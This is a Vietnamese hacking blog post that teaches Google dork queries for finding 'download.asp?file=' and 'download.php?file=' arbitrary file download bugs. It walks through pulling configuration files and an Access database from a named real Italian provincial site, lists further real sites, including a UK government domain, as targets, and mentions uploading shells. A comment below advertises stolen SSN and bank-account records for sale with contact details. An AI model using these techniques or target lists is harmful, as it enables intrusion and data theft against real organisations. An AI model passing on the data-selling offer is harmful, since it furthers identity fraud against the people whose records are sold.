Hack qua search link google
Hôm nay tình cờ Online trên web gặp ông anh cũ, chát chít và tán phiếm vài câu ổng share cho vài cái Key hack shop tình cờ bắt gặp luôn cái bug mới này, ngạc nhiên vì nhiều site mắc lỗi bug này quá. ko tin ae thử xem.
Đầu tiên anh em vào google và gõ key search : http://google.com gõ keyword: allinurl: “download.asp?file=” hoặc
allinurl: “download.php?file=” hoặc
allinurl: “dl.asp?file=” hoặc
allinurl: “dl.php?file=” ….
Nó sẽ cho ra hàng loạt site dính bug này, thật là một nguồn tài nguyên khổng lồ cho việc thực hành và upload shell lên các server. Nó là sự kết hợp hoàn hảo giữa Google và RLI (Remote File Inclusion)
Bạn search trên Google xem nó thông báo có phát hoảng ko nhỉ? Không dưới hàng ngàn trang ^^
Thấy cái link nào dạng: download.asp?file=TENFILE thì có khả năng nghịch rồi.
Ví dụ: http://www.provincia.so.it/download.asp?file=DIU_GI_DO
Ta thử: http://www.provincia.so.it/download.asp?file=default.asp
Có một file mời download. Mở ra coi thấy có dòng:
Tiếp tục: http://www.provincia.so.it/download.asp?fi…/connettiDB.asp
Lại có một file nữa mời download. Mở ra coi thây có dòng:
Tiếp tục: http://www.provincia.so.it/download.asp?fi…de/connOpen.asp
Lại một file nữa. Mở ra coi thấy có dòng:
percorsoDatabase=”/database/DBSito.mdb”
Khè khè, bây giờ có 2 cách để lấy file database đó:
http://www.provincia.so.it/download.asp?fi…base/DBSito.mdb hoặc http://www.provincia.so.it/database/DBSito.mdb
Chú ý: Đây chẳng phải là một mã nguồn cụ thể nào cả, nên tinh ý một chút chứ đừng rập theo khuôn mẫu quá nghen, nên dựa vào ví dụ trên và ứng dụng một cách hợp lý. Với ASP thì thông thường trang chủ là default.asp, đôi khi là index.asp. Nhiều khi có 1 trong 2 trang này nhưng file lại chẳng chứa thông tin gì nhạy cảm—> hãy thử file khác.
Một số link khác để anh em nghịch luôn nghen
http://www.aido-bz.it/dl.php?file=
http://www.jcdecaux.lt/dl.php?file=
http://www.provincia.so.it/download.asp?file=
http://www.guna.it/C_Common/Download.asp?file=
http://www.thaifilm.com/inc/download.asp?file=
http://www.maiden.gov.uk/download.asp?file=
http://www.mrzstandard.com/inc/download.asp?file=
http://www.jvc-me.com/prodimages/Downloads…nload.asp?file=
Chúc anh em vui vẻ, có gì ko hiểu thì pm lên ae cùng thảo luận thêm nghe :”>
(VNIT sưu tầm)
Các bài viết khác:
Tác giả bài viết:
Mr. Gon - đã đăng 2391 bài trên VNIT™ - VNITWEB.
VNIT™ - Công nghệ thông tin và giải trí tổng hợp - Share For You, Free For All
| VNIT's RSSurl: http://vnitweb.com/?p=1907
1 comment:
Hi All!
I'm selling fresh & genuine SSN Leads, with good connectivity. All data is tested & verified.
Headers in Leads:
First Name | Last Name | SSN | Dob | Address | State | City | Zip | Phone Number | Account Number | Bank NAME | DL Number | House Owner
*You can ask for sample before any deal
*Each SSN lead will be cost $1
*Premium Lead will be cost $5
*If anyone wants in bulk I will negotiate
*Sampling is just for serious buyers
Hope for the long term deal
For detailed information please contact me on:
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
Post a Comment